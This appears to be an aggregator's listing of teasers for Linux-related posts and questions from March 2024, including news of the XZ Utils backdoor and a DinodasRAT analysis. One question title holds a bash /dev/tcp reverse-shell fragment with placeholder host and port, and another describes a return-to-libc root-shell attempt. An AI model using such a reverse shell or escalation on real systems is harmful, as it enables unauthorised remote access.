linux – Page 28 – WindowsTechs.com

Bash deletes null bytes in exploit input for ROP/returntolibc

Posted on March 30, 2024 by germphjd

I am trying to do a returntolibc exploit. The goal is to gain a shell with root privilege by calling setuid(0) and then system("/bin/sh"). I have been agonizing over trying to get this thing to accept my payload, but bash keeps d… Continue reading Bash deletes null bytes in exploit input for ROP/returntolibc→

XZ compromise and consequences for people having used it

Posted on March 29, 2024 by Artem S. Tashkinov

Here’s a hot topic:

https://www.redhat.com/en/blog/urgent-security-alert-fedora-41-and-rawhide-users
https://lwn.net/Articles/967180/
https://lwn.net/ml/oss-security/20240329155126.kjjfduxw2yrlxgzm@awork3.anarazel.de/

I’m not an expert i… Continue reading XZ compromise and consequences for people having used it→

Beware! Backdoor found in XZ utilities used by many Linux distros (CVE-2024-3094)

Posted on March 29, 2024 by Zeljka Zorz

A vulnerability (CVE-2024-3094) in XZ Utils, the XZ format compression utilities included in most Linux distributions, may “enable a malicious actor to break sshd authentication and gain unauthorized access to the entire system remotely,” R… Continue reading Beware! Backdoor found in XZ utilities used by many Linux distros (CVE-2024-3094)→

Windows 10: It’s Like Riding a Bike (Premium)

Posted on March 29, 2024 by Paul Thurrott

In June 2021, Microsoft announced Windows 11 with the type of virtual event that still felt weird in that not-quite post-pandemic world. But these are the moments I live for: My writing career started 30 years ago, it’s always centered on Windows and M… Continue reading Windows 10: It’s Like Riding a Bike (Premium)→

DinodasRAT Linux implant targeting entities worldwide

Posted on March 28, 2024 by Anderson Leite, Lisandro Ubiedo

In this article, we share our analysis of a recent version of the DinodasRAT implant for Linux, which may have been active since 2022. Continue reading DinodasRAT Linux implant targeting entities worldwide→

MX Linux SSH folder in tmp directory [closed]

Posted on March 28, 2024 by Dustin LaRoche

Even though I don’t have SSH or OpenSSH installed on my machine, I noticed that I have the following directory ssh-XXXXXX2ivnoU in the tmp directory. Inside that directory is a file named agent.2640
What could be causing the creation of th… Continue reading MX Linux SSH folder in tmp directory [closed]→

Webserver Runs on Android Phone

Posted on March 28, 2024 by Bryan Cockfield

Android, the popular mobile phone OS, is essentially just Linux with a nice user interface layer covering it all up. In theory, it should be able to do anything a …read more Continue reading Webserver Runs on Android Phone→

How does bash > /dev/tcp/"ip"/"port" 0<&1 keep connection alive? [closed]

Posted on March 27, 2024 by gtj520

I am studying a reverse shell created by /dev/tcp.
When you create a tcp socket using /dev/tcp, it ends its connection immediately after
data is sent. But when you create a reverse shell by bash > /dev/tcp 0<&1, it keeps the tcp … Continue reading How does bash > /dev/tcp/"ip"/"port" 0<&1 keep connection alive? [closed]→

Galvanize Your Grip On Grep With This Great Grep Guide

Posted on March 27, 2024 by Ryan Flowers

Grep By Example is also available as a PDF Minibook, and a Grep playground helps you learn quickly.

These days, you can’t throw a USB stick without hitting something that’s running Linux. It might be a phone, an embedded device, or your TV. Either way, it’s running Linux, …read more Continue reading Galvanize Your Grip On Grep With This Great Grep Guide→

Can Linux effectively remove malware from an infected NVMe drive? [closed]

Posted on March 26, 2024 by Nourdine Dali

If yes, can you please give me the commands for this, and which distro can do better in this context?
And can I format it as an external drive or can I format while I am using it as a host system?

Continue reading Can Linux effectively remove malware from an infected NVMe drive? [closed]→